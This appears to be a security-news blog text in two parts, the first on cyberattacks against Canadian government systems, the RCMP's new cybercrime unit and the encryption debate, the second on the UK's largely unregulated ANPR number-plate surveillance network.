The Canadian Government revealed that its systems are under unceasing attacks, earlier this year, hacktivists accessed documents pertaining to the technology infrastructure at the Canadian Security Intelligence Service’s foreign bureaus.

In many cases, hackers targeted Government websites with DDoS attack in retaliation for government legislation.


The Royal Canadian Mounted Police consider the establishment of its cyber unit strategic.

“The team will enhance the RCMP’s ability to combat cybercrime-related offences where technology plays an integral role, such as investigating the unauthorized use of computers, mischief in relation to data, or the possession of a device to commit unauthorized computer use or data mischief,” the plan reads.

The ViceNews reported the statement of Jeff Adam, Chief Superintendent with Royal Canadian Mounted Police, which explained the difficulties law enforcement are facing when dealing online crime.

“Insofar as the apparent, as you say, lack of outcomes,” Adam said on a conference call presenting the action plan. “Cybercrime investigations, starting off, can involve encryption, the darknet, multinational jurisdictions — and, many times, many different national jurisdictions — and it is a complex and time-consuming task to both identify, gather the evidence on, and to bring those people into the realm of justice.

“And while there might not be, apparently, anything happening, this is not as simple as catching the car speeding down the street,””This is infinitely more complex and requires a whole new way of doing business.”

Darknet and encrypted communications complicate the investigation, the RCMP Commissioner Bob Paulson expressed his frustration with encryption at a security conference in November.

“It’s a very difficult proposition to bring traditional criminal justice strategies to bear in a place where anonymity is protected,” “We’re chasing the wrong Holy Grail. I am all for new legislation, I am all for warrantless access to subscriber info,”

But privacy advocates and activists consider the cryptographic practice as a pillar of the freedom of expression on the Internet,

“The intelligence services of the world claim that encryption is a problem,” said Jacob Appelbaum at the recent World Forum for Democracy conference. “But the evidence has come out that, in fact, the attacks in Paris were perpetrated by people who used credit cards in their real name, who used unencrypted text messages to say things like ‘let’s go.'”

Unfortunately, someone is riding the recent dramatic events like the Paris attacks to argument online surveillance activities, but the Canadian Liberal government seems to have a different policy on the online monitoring activities.

UK ANPR systems are one of the ‘world’s biggest surveillance systems’

The automatic number plate recognition systems (ANPR) used by the UK police are one of the largest surveillance systems in the world.
When dealing surveillance systems the majority of people imagines skilled hackers that break their computers or communication lines in order to spy on specific targets.

The situation is quite different, we are surrounded by a number of systems that collect an impressive amount of data that could be used to spy on us.

If you are a Briton for example, you have to know that in your country there is a widespread use of automatic number plate recognition systems (ANPR). These systems are used by the UK law enforcement and are considered one of the largest surveillance systems in the world. The principal problem related to the use of the automatic number plate recognition systems is the absence of a legal framework that regulate its usage.

automatic number plate recognition systems ANPR

During a speech at Stirling University, the UK’s surveillance camera commissioner Tony Porter raised the issue related to usage of the automatic number plate recognition systems in the UK.

In the UK there are currently 8,300 ANPR cameras that every day collect the data related to 25-35 million ‘read.’ These records are sent to the National ANPR Data Centre, but there isn’t any legal framework governing this process, that clearly represent a mass data collection.

“ANPR in the UK must surely be one of the largest data gatherers of its citizens in the world,” Porter said. “I would like to put forward that the use of ANPR cameras has an extremely unsteady legal framework,”

The UK Government considers the automatic number plate recognition systems just one of the data source available to the law enforcement and, for this reason, they don’t need to be regulated.

I sincerely don’t this so, the ANPR systems of the country belong to one of the powerful “non-military” surveillance network and need to be clearly regulated. Aspect related to data management, data access and their protection have to be shared with the UK citizens.

“I am not 100 percent clear on this and when I’ve spoken to the Home Office they’ve informed me that ANPR is just another tool in the policing toolkit and does not require a statutory authority,” added Porter.

“So, as long as National ANPR Standards and Procedures offers sufficient safeguards to protect against the article 8 right against intrusion into privacy any legal challenge is set to fail. Or is it?”

“But who gave their consent to this? Where is the legislation, and where was the debate in parliament? So I argue that some forms of surveillance have no legislative framework whatsoever,” he added.

To support Porter it arrives the statements of Daniel Nesbitt, research director of Big Brother Watch, who argues the need to open a debate on the usage of number plate recognition systems.

“Although ANPR was first installed to tackle specific issues with 350 images now being captured every second it is impossible for motorists to travel without having their details captured and stored, regardless of whether or not they are doing anything wrong,” explained Daniel Nesbitt.

“An open and honest debate about how this technology is being used as well as how far it invades the privacy of ordinary motorists is now long overdue. For starters we need to see regular reports being published on how the system is being run and exactly what safeguards can be put in place to protect the public.”

When dealing with surveillance systems, especially civil ones, I’m always worried about the effective level of security they implement. A persistent attacker could breach them accessing an impressive amount of data that could be used to harm the Homeland security. I believe that also the security of these systems must be regulated in a legal framework to protect citizens.